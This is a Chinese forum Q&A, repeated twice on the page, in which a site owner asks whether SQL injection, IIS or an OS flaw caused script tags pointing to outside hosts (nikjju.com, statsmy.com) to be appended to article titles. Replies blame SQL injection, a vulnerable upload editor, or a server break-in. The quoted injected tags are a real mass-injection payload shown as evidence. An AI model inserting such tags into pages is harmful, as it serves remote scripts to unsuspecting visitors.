这种情况,是操作系统漏洞,还是 IIS 或 SQL 注入?解决办法
日期:2014-05-17 浏览次数:21051 次
这种情况,是操作系统漏洞,还是 IIS 或 SQL 注入?
网站:
windows 2003 + ASP + Sql2000
所有文章的标题,被加上了 后缀,比如:
今年情人节出怪招 不走浪漫走传统 ,变成:
今年情人节出怪招 不走浪漫走传统 </title><script src=http://nikjju.com/r.php ></script>
野外露头保护措施,变成
野外露头保护措施 </title><script src=http://statsmy.com/ur.php ></script>
这种情况,是 SQL注入的还是 IIS 或 操作系统漏洞 造成的?
------解决方案--------------------
SQL漏洞。。
检查程序传入SQL参数,
过滤“'",";"等非法字符
------解决方案--------------------
如果网站有上传功能的话,也有可能是上传的程序(在线编辑器)有漏洞,上传了木马程序.
------解决方案--------------------
这是 操作系统漏洞造成的
有人进入了你的服务器,并在生成 HTML 的程序或模板中插入了脚本代码
网站:
windows 2003 + ASP + Sql2000
所有文章的标题,被加上了 后缀,比如:
今年情人节出怪招 不走浪漫走传统 ,变成:
今年情人节出怪招 不走浪漫走传统 </title><script src=http://nikjju.com/r.php ></script>
野外露头保护措施,变成
野外露头保护措施 </title><script src=http://statsmy.com/ur.php ></script>
这种情况,是 SQL注入的还是 IIS 或 操作系统漏洞 造成的?
------解决方案--------------------
SQL漏洞。。
检查程序传入SQL参数,
过滤“'",";"等非法字符
------解决方案--------------------
如果网站有上传功能的话,也有可能是上传的程序(在线编辑器)有漏洞,上传了木马程序.
------解决方案--------------------
这是 操作系统漏洞造成的
有人进入了你的服务器,并在生成 HTML 的程序或模板中插入了脚本代码
免责声明: 本文仅代表作者个人观点,与爱易网无关。其原创性以及文中陈述文字和内容未经本站证实,对本文以及其中全部或者部分内容、文字的真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
